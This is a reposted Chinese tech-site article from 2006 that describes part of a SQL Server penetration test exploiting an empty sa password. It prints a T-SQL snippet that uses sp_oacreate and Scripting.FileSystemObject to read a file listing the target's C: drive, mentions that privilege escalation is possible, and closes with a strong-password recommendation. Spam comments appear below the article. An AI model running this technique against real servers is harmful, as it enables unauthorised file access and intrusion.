一次简单的sqlserver的安全测试（2）

<%@ page contentType="text/html; charset=gb2312"%> 一次简单的sqlserver的安全测试（2）

网站公告： ◆北天JAVA技术网热情为java爱好者服务，本网内容包括JAVA(JSP、servlet、EJB、webservice、j2ee、javabean、应用服务器、JavaScript),数据库(MYSQL、SQL Server、Sybase、Oracle、DB2、数据库综合知识),设计研究(设计模式、Struts、Spring、Hibernate、设计框架、设计综合知识),WEB2.0新技术(主要介绍AJAX),以及各种技术的入门、实例、例子等等,欢迎各位多来坐坐！◆ 诚邀各位JAVA爱好者加盟！◆ 本网站内容丰富，更新快，保证每周20篇以上！

	加入收藏
	设为首页
	联系站长
	承接项目

相关资源：网站首页 | 免费培训学院 | 技术论坛 | JAVA聊天室 | 作家专栏 | 开发工具 | 认证考试 | 会员俱乐部

JAVA技术：初学者园地 | jsp与servlet | javascript | Java源代码 | EJB | web service | 应用服务器 | JAVA综合知识

设计研究：设计模式 | 设计框架 | Struts | Spring | Hibernate | 开源项目 | 面向对象设计 | 设计综合知识

数据库：MYSQL | SQL Server | Sybase | Oracle | DB2 | Informix | Access | 数据库综合知识

其他资源：AJAX新技术 | 网站开发 | ERP软件 | OA办公软件 | 商业智能BI | 开发综合知识 | 承接项目 | 项目试用

一次简单的sqlserver的安全测试（2）

发布者：发布时间：2006-05-07

在sql server的查询分析器里面我们在远程执行这个脚本，成功以后我们就可以利用ie去远程的服务器上调用这个文件来执行里面的程序。

ie执行成功以后，我们再利用另外一个sql脚本来查看结果。

     -- scripting.filesystemobject example - read a known filedeclare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate ''scripting.filesystemobject'', @o outexec sp_oamethod @o, ''opentextfile'', @f out, ''c:\i0.sys'', 1exec @ret = sp_oamethod @f, ''readline'', @line outwhile( @ret = 0 )beginprint @lineexec @ret = sp_oamethod @f, ''readline'', @line outend

ok，我们可以从sql server中远程看到对方服务器的c盘文件列表了，当然你还可以做很多其他的事情，比如提升你的权限等等。但是做为远程渗透服务测试来说，我们已经圆满的完成了客户的要求。

事后分析来看对方的网络管理员其实对服务器做了很多配置，所以留下这个sa的空口令可能是因为一些其他的原因，我们知道sql server2000安装的时候其实是没有这个空口令问题的，客户可能是由于内部客户端的一些使用上的原因而留下的这个问题，我已经建议客户去给数据库一个强壮的口令以解决这个问题了。

(转载文章请保留出处：北天JAVA技术网(www.java114.com))

更多精彩文章:

sqlserver2000允许用户执行任意指令/非法提升用户权限的修补

sqlserver2000存在严重的拒绝服务和缓冲溢出缺陷的修补

microsoftsql的多个安全缺陷的解决方法

sqlserver2000的安全配置（1）

sqlserver2000的安全配置（2）

sqlserver2000的安全配置（3）

最近评论:

冰封的往事！

wow power leveling,wow gold,WoW Gold,wow gold max(4309)

飞舞的传奇！

传世私服,传世私服.传奇世界私服传奇世界私服,传世私服传世私服, 传奇世界私服传奇世界私服.传奇私服传奇私服. max(3715)

标　题:

内　容:

免责声明:该文章由网友发表,如果对您造成侵权,请联系站长。

首页 - 承接项目 - 网站地图 - 联系我们 -

版权所有北天JAVA技术工作室 ICP证号:粤ICP备06079815号